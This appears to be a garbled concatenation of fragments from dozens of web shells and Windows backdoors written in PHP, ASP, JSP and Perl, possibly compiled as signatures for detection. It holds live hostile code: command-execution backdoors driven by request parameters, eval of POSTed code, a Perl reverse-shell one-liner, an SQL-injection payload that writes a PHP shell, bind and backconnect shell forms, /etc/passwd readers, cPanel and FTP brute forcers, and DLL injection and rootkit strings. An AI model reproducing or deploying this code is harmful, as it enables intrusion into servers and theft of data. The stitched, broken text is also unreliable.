2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo 